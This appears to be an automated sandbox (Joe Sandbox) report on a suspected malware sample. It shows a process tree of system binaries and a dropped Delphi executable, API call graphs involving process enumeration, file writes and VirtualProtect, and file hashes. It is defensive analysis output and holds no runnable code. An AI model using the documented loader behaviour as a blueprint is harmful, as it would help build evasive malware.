                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                      File size:23'552 bytes
                                                                                                                                                                                                                      MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:09:25:03
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:09:25:16
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      File size:13'599'640 bytes
                                                                                                                                                                                                                      MD5 hash:C52C721E095A91BB0D589DD0206D5F3D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:09:25:16
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      File size:13'599'640 bytes
                                                                                                                                                                                                                      MD5 hash:C52C721E095A91BB0D589DD0206D5F3D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:09:25:18
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                      File size:23'552 bytes
                                                                                                                                                                                                                      MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:09:25:18
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:09:25:19
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                      File size:23'552 bytes
                                                                                                                                                                                                                      MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                      Start time:09:25:19
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:09:25:23
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:09:25:29
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                      Start time:09:25:35
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:22.5%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:5.6%
                                                                                                                                                                                                                        Total number of Nodes:142
                                                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                                                        execution_graph 2390 6335d3 2397 633523 2390->2397 2391 6335cd 2393 63365e 2391->2393 2394 630e8d GlobalAlloc 2391->2394 2392 6311dd GlobalAlloc 2392->2397 2395 63108d GlobalAlloc 2393->2395 2396 633668 2393->2396 2398 6336b7 2393->2398 2394->2393 2395->2398 2397->2391 2397->2392 2399 6329fd 4 API calls 2397->2399 2398->2396 2400 6324bd GlobalAlloc 2398->2400 2399->2397 2401 633764 2400->2401 2402 631a2d 2 API calls 2401->2402 2403 63379b 2402->2403 2404 6324bd GlobalAlloc 2403->2404 2405 6337d8 2404->2405 2406 6337f5 VirtualProtect 2405->2406 2407 631dad 2406->2407 2408 633832 VirtualProtect 2407->2408 2408->2396 2241 63389d 2244 632c3d 2241->2244 2245 632ca6 2244->2245 2301 631bed 2245->2301 2247 632cdb 2248 631bed GetPEB 2247->2248 2249 632cf2 2248->2249 2304 6324bd 2249->2304 2251 632f6a 2307 63170d 2251->2307 2253 632f87 2310 631a2d 2253->2310 2255 632fa4 2256 6324bd GlobalAlloc 2255->2256 2257 6330ac 2256->2257 2314 63169d 2257->2314 2259 6330c9 2260 631a2d 2 API calls 2259->2260 2261 6330dc 2260->2261 2317 63251d 2261->2317 2263 633154 2324 63178d 2263->2324 2265 633230 2327 631dfd CreateFileW 2265->2327 2267 633252 2332 63271d 2267->2332 2269 633292 2270 6333a0 2269->2270 2271 63334c 2269->2271 2273 6333d8 2270->2273 2274 6333a8 2270->2274 2336 6328cd 2271->2336 2276 6324bd GlobalAlloc 2273->2276 2342 63189d 2274->2342 2278 6333e5 2276->2278 2279 6324bd GlobalAlloc 2278->2279 2281 633463 2279->2281 2280 6336b7 2282 6324bd GlobalAlloc 2280->2282 2293 633668 2280->2293 2346 6317dd 2281->2346 2284 633764 2282->2284 2286 631a2d 2 API calls 2284->2286 2285 6334b5 2287 6335cd 2285->2287 2289 6324bd GlobalAlloc 2285->2289 2288 63379b 2286->2288 2291 633398 2287->2291 2361 630e8d 2287->2361 2292 6324bd GlobalAlloc 2288->2292 2299 633510 2289->2299 2291->2280 2291->2293 2365 63108d 2291->2365 2294 6337d8 2292->2294 2295 6337f5 VirtualProtect 2294->2295 2340 631dad 2295->2340 2299->2287 2351 6311dd 2299->2351 2354 6329fd 2299->2354 2368 632bed GetPEB 2301->2368 2303 631c0d 2303->2247 2305 6324d9 GlobalAlloc 2304->2305 2306 6324cd 2304->2306 2305->2251 2306->2305 2308 6324bd GlobalAlloc 2307->2308 2309 63171c 2308->2309 2309->2253 2311 6324bd GlobalAlloc 2310->2311 2312 631a3e 2311->2312 2313 631a51 LoadLibraryW 2312->2313 2313->2255 2315 6324bd GlobalAlloc 2314->2315 2316 6316ac 2315->2316 2316->2259 2319 632532 2317->2319 2318 6324bd GlobalAlloc 2318->2319 2319->2318 2320 63256a NtQuerySystemInformation 2319->2320 2323 632558 2319->2323 2320->2319 2321 632596 2320->2321 2322 6324bd GlobalAlloc 2321->2322 2322->2323 2323->2263 2325 6324bd GlobalAlloc 2324->2325 2326 63179b 2325->2326 2326->2265 2328 631e31 2327->2328 2331 631e2a 2327->2331 2329 6324bd GlobalAlloc 2328->2329 2328->2331 2330 631e6d ReadFile 2329->2330 2330->2331 2331->2267 2333 63272e 2332->2333 2334 631a2d 2 API calls 2333->2334 2335 632803 2334->2335 2335->2269 2337 6328f0 2336->2337 2338 632985 2337->2338 2339 6329fd 4 API calls 2337->2339 2338->2291 2339->2337 2341 631db9 VirtualProtect 2340->2341 2341->2293 2343 6318c0 2342->2343 2344 630e8d GlobalAlloc 2343->2344 2345 63190e 2343->2345 2344->2343 2345->2291 2347 6324bd GlobalAlloc 2346->2347 2348 6317ee 2347->2348 2349 6324bd GlobalAlloc 2348->2349 2350 631810 2349->2350 2350->2285 2369 63142d 2351->2369 2353 631222 2353->2299 2355 6317dd GlobalAlloc 2354->2355 2356 632a0c 2355->2356 2375 6323ed CreateFileW 2356->2375 2360 632a31 2360->2299 2362 630eb7 2361->2362 2363 630ebe 2361->2363 2362->2291 2363->2362 2364 6324bd GlobalAlloc 2363->2364 2364->2363 2366 6324bd GlobalAlloc 2365->2366 2367 6310a0 2366->2367 2367->2280 2368->2303 2371 63143c 2369->2371 2370 631448 2370->2353 2371->2370 2372 6324bd GlobalAlloc 2371->2372 2373 631533 2372->2373 2374 6324bd GlobalAlloc 2373->2374 2374->2370 2376 63241e WriteFile 2375->2376 2377 63241a 2375->2377 2376->2377 2377->2360 2378 633a4d 2377->2378 2379 633a5e 2378->2379 2380 633af1 malloc 2379->2380 2381 633a9d 2379->2381 2380->2381 2381->2360 2382 63194d 2387 63119d 2382->2387 2384 631965 2385 631dfd 3 API calls 2384->2385 2386 63198d 2385->2386 2388 6324bd GlobalAlloc 2387->2388 2389 6311ab 2388->2389 2389->2384

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 257 63251d-63252b 258 632532-632539 257->258 259 632684-632688 258->259 260 63253f-632556 call 6324bd 258->260 263 632558 260->263 264 63255d-63258a call 631f2d NtQuerySystemInformation 260->264 263->259 267 632596-6325b3 call 6324bd 264->267 268 63258c-632594 264->268 271 6325b6-6325bc 267->271 268->258 272 6325c2-6325c9 271->272 273 63267d 271->273 274 6325cf-6325ef call 631f2d 272->274 275 63266d-632678 272->275 273->259 278 6325fa-632600 274->278 275->271 279 632602-63260e 278->279 280 632626-632652 call 6322ed call 631b6d 278->280 279->280 281 632610-632624 279->281 287 632654-63265a 280->287 288 63265c-632665 280->288 281->278 287->275 288->275 289 632667-63266a 288->289 289->275
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED
                                                                                                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 00632581
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocGlobalInformationQuerySystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3737350999-0
                                                                                                                                                                                                                        • Opcode ID: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                                                                                                        • Instruction ID: e927c1356fe4f02aca1b3b3252597500f30b78b6b1ccaa5a6689106d069b00d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C51FFB5D0020AEFCB04CF98C8A1AEEB7B6FF49300F108599E915A7341D735AE41CBA5

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 0 632c3d-63315d call 63268d call 631bed * 2 call 631aad * 18 call 6324bd call 63170d call 631a2d call 631aad * 8 call 6324bd call 63169d call 631a2d call 631aad * 3 call 63251d 80 63315f-633166 0->80 81 63318d-6332d3 call 631aad * 3 call 63178d call 631dfd call 631aad call 63271d 0->81 82 633171-633175 80->82 102 6332d5-6332d9 81->102 103 6332db-6332e6 81->103 82->81 83 633177-63318b call 63227d 82->83 83->82 104 6332ec-63334a 102->104 103->104 105 6332e8 103->105 106 6333a0-6333a6 104->106 107 63334c-633393 call 6328cd 104->107 105->104 109 6333d8-633413 call 6324bd call 631dad 106->109 110 6333a8-6333d3 call 63189d 106->110 113 633398-63339b 107->113 123 63341d-633423 109->123 116 63366d-633681 110->116 113->116 118 633683-6336bf call 63108d 116->118 119 6336c8-6336d4 116->119 128 6336c1 118->128 129 6336c6 118->129 122 6336d7-6336fa call 631d4d 119->122 133 63370b-633887 call 63199d call 6324bd call 631fad call 63239d call 631a2d call 632c0d call 6324bd call 631dad VirtualProtect call 631dad VirtualProtect 122->133 134 6336fc-633705 122->134 126 633452-633469 call 6324bd 123->126 127 633425-633450 123->127 138 633470-63347b 126->138 127->123 132 633891-633894 128->132 129->122 186 63388e 133->186 134->133 140 63347d-63349a 138->140 141 63349c-6334ff call 6317dd call 631b6d call 63159d 138->141 140->138 154 633505-633519 call 6324bd 141->154 155 63363d-633643 141->155 164 633523-63352a 154->164 155->116 157 633645-633666 call 630e8d 155->157 157->116 166 633668 157->166 167 633530-633557 call 6315bd 164->167 168 633617-63363a call 6315ad 164->168 166->132 177 633579-63359e call 6311dd 167->177 178 633559-633577 call 63227d 167->178 168->155 184 6335a2-6335ad 177->184 185 6335a0 177->185 178->164 187 633612 184->187 188 6335af-6335cb call 631a6d 184->188 185->164 186->132 187->164 191 6335d5-63360e call 6329fd 188->191 192 6335cd-6335d1 188->192 191->187 195 633610 191->195 192->168 195->168
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED
                                                                                                                                                                                                                          • Part of subcall function 00631A2D: LoadLibraryW.KERNELBASE(?), ref: 00631A5E
                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 00633812
                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 00633845
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2510009449-0
                                                                                                                                                                                                                        • Opcode ID: b2f67e5c1deada5e11ff38754e35feaca63e07875fc6d6034ab12c462bdc80f3
                                                                                                                                                                                                                        • Instruction ID: f8ecd0ee32df52de45be3ee3de65d06197aa54cbc33c33621ba615f2593e3ccc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2f67e5c1deada5e11ff38754e35feaca63e07875fc6d6034ab12c462bdc80f3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4592B7B5E00218EFDB54DF98C991EEEB7B6BF88300F148199E509AB341D631AE41CF94

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 196 633a4d-633a9b call 631f2d 201 633aa4-633adc 196->201 202 633a9d-633a9f 196->202 206 633af1-633b1d malloc 201->206 207 633ade-633aec 201->207 203 633c80-633c83 202->203 208 633b28-633b2e 206->208 207->203 209 633b30-633b37 208->209 210 633bae-633bb2 208->210 212 633b42-633b48 209->212 213 633bd6-633bed call 632b1d 210->213 214 633bb4-633bd1 210->214 216 633b4a-633b64 212->216 217 633ba9 212->217 221 633bef-633c0c 213->221 222 633c0e-633c3a 213->222 214->203 223 633b69-633ba7 call 6338bd 216->223 217->208 221->203 226 633c45-633c4d 222->226 223->212 229 633c72-633c79 226->229 230 633c4f-633c70 226->230 233 633c7e 229->233 230->226 233->203
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: J*c
                                                                                                                                                                                                                        • API String ID: 0-966536654
                                                                                                                                                                                                                        • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                                                        • Instruction ID: 138c1e0c22fea212c8999007eefdc6166b41c463725099b238a90c11c38a07a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB91DA75D04219EFCB08CF98D890AEEFBB6BF88310F148159E515AB351D734AA45CFA4

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 235 631dfd-631e28 CreateFileW 236 631e31-631e4e 235->236 237 631e2a-631e2c 235->237 240 631e60-631e96 call 6324bd ReadFile 236->240 241 631e50-631e5e 236->241 238 631ebe-631ec1 237->238 245 631ea8-631ebc 240->245 246 631e98-631ea6 240->246 241->238 245->238 246->238
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00631E1F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                        • Opcode ID: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                                                                                                        • Instruction ID: 2b29a393c4a5116fc6a778d721da35c4eca03a53666dfea594c6023595a03fca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6531A075A00108FFCB14DF98C891F9EB7B5EF49710F20C198E9159B395D631AE42DB90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 249 6323ed-632418 CreateFileW 250 63241a-63241c 249->250 251 63241e-632441 WriteFile 249->251 252 632461-632464 250->252 253 632453-63245f 251->253 254 632443-632451 251->254 253->252 254->252
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0063240F
                                                                                                                                                                                                                        • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0063243D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$CreateWrite
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2263783195-0
                                                                                                                                                                                                                        • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                                                        • Instruction ID: 47f34889c8536e0dff849bc9c84cfc9ba2cee898cc930745a86d305a9c3c3ab7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D012D74600109BBCB10DE58CC91F9AB3B9AF88714F20C154FE189B381D631EE02DB90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 290 631a2d-631a69 call 6324bd call 631ffd LoadLibraryW
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED
                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00631A5E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocGlobalLibraryLoad
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3361179946-0
                                                                                                                                                                                                                        • Opcode ID: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                                                                                                        • Instruction ID: e6a8e9eb5ddc53e289ffc9fd25be50e8bec4f8659fe4ffc4fa7109d8bd5f3ae7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0E0ED75E00208BBCB40EFA8DD8299D7BF9AF48301F108198F9089B341E631AA118BD1

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 318 6324bd-6324cb 319 6324d9-6324f2 GlobalAlloc 318->319 320 6324cd-6324d6 318->320 320->319
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                                        • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                                                        • Instruction ID: 0d6fe219c5b771053ed1ca33ae3d9df49f3793674d0b96cc3457159f015ea55b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF02278614209EFCB44DF99D590999B7A5EB48360F10C299AC198B341D631EE81DB94

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 321 50dfe1-50e008 323 50e1c9-50e1ef 321->323 324 50e00e-50e020 call 50ed34 call 50dc54 321->324 330 50e025-50e02c 324->330 331 50e032-50e12b call 50d9b4 * 3 330->331 332 50e1a8-50e1c4 330->332 358 50e12d-50e149 331->358 359 50e14e-50e163 331->359 332->323 358->359
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7cb9366395d1bde9188d8c533a5f261ceadb32812a651fb702a2e83f45a32b03
